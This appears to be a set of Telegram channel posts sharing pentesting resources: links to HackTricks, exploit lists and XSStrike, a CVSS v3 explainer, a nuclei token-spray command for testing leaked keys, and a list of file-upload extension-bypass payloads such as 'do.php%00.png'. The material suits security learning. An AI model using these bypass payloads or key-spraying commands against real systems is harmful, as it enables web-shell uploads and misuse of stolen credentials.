Resume @GitBook_s #1en #2fa #3fa #4fa #5fa #6fa #7fa #8fa #9fa #10fa #11fa #12fa #13fa #14fa #15fa #16fa #17fa #18fa-1 #19fa-2 #20fa-3 #21fa-4 #22fa-5 #23fa-6 #24fa-7 #25fa-8 #26fa-check_list

http://GitBook_s.t.me

https://pocorexp.nsa.im
lists all CVEs and public exploit

𝗛𝗔𝗖𝗞𝗧𝗥𝗜𝗖𝗞𝗦

•Generic Metodolohies & Resources
•Generic Hacking
•Linux Hardening
•MacOS Hardening
•Windows Hardening
•Mobile Pentesting
•Network Services Pentesting
•Pentesting Web
•Cloud Security
•Hardware/Physical Access
•Binary Exploitation
•AI
•Reversing & Exploiting
•Crypto & Stego
•TODO

Link 🔗:-
https://book.hacktricks.wiki/en/index.html

@GitBook_s

Hi world

CVSS V3 Cheat Sheet
@GitBook_s

🎯What is CVSS and why it is important?

🔐CVSS, or Common Vulnerability Scoring System, is a global standard for scoring the severity of security vulnerabilities.

When you find a vulnerability (for example, in a bug bounty or penetration test), you need to know how dangerous it is, what its impact is, and how quickly you need to react to it. That's where CVSS comes in! 🚨

---
📊 How does it work?

So CVSS gives each vulnerability a number between 0.0 and 10.0:

* 🔵 0.0–3.9 = Low
* 🟡 4.0–6.9 = Medium
* 🟠 7.0–8.9 = High
* 🔴 9.0–10.0 = Critical

This score is calculated based on 3 main metrics:

1. Base Score – the basic nature of the vulnerability

✅ Access required (local, network)
✅ Complexity of the exploit
✅ Authentication required
✅ Impact on confidentiality, integrity, availability

2. Temporal Score – Changes over time

🕐 Is there a public exploit?
🛠 Has a fix been provided?
📉 How reliable is the technical report?

3. Environmental Score – Impact in the specific environment

🏢 How important is the vulnerability to the specific organization or system?
🔧 Are some factors in the environment recoverable?

---
🛠 What are its uses?

✅ Patch Management prioritization
✅ Bug severity determination in bug bounty programs
✅ Professional reporting to organizations
✅ Risk analysis in information security teams
✅ Documentation and CVE Tracking

---

🧮 Where to use it?

🔗 Official CVSS v3.1 Calculator
(https://www.first.org/cvss/calculator/3.1)

---

🧑‍💻 In short?

When you find a vulnerability, don't just say "it was dangerous", give it a number with CVSS, make it comparable and analyze it more professionally! 😎

WAF Bypass Arsenal - Full-Width Unicode Symbols Cheatsheet for XSS, CRLF & WAF Bypass:https://wafbypass.berrry.app/

CVE is a catalog of known software flaws, with each ID representing a specific vulnerability.

CWE, on the other hand, is a category system for software and hardware weaknesses that can lead to vulnerabilities.

Cve and cwe in persian
توضیح فارسی

https://www.aparat.com/v/d015i58

You can use XSStrike for reflected and DOM XSS scanning.

🔹 multi-threaded crawling
🔹 WAF detection & evasion
🔹 outdated JS lib scanning
🔹 blind XSS support
🔹 bruteforce payloads from a file

#XSS

https://github.com/s0md3v/XSStrike
@GitBook_s

🕵️VeryLazyTech

Vulnerabilities and Exploits
Dorks
Resources
Pentesting Web
Linux
Windows
Network Pentesting
Post-exploitation
Technical guides

Link 🔗:-
https://www.verylazytech.com/

@GitBook_s

This is GitBook ...

nuclei -t token-spray/ -var token=keys.txt

https://github.com/streaak/keyhacks

#InfoDisclosure
@GitBook_s

Extension Bypass V2

🔸 do.php%00.png
🔸 do.php%0A.png
🔸 do.php\n.png
🔸 do.php\u000a.png
🔸 do.php\u560a.png
🔸 do.php%E5%98%8A.png
🔸 do.php#.png
🔸 do.php%23.png
🔸 do.php\u0023.png
🔸 do.php;.png
🔸 do.php%3B.png
🔸 do.php\u003b.png
🔸 do.php\u563b.png
🔸 do.php%E5%98%BB.png

@GitBook_s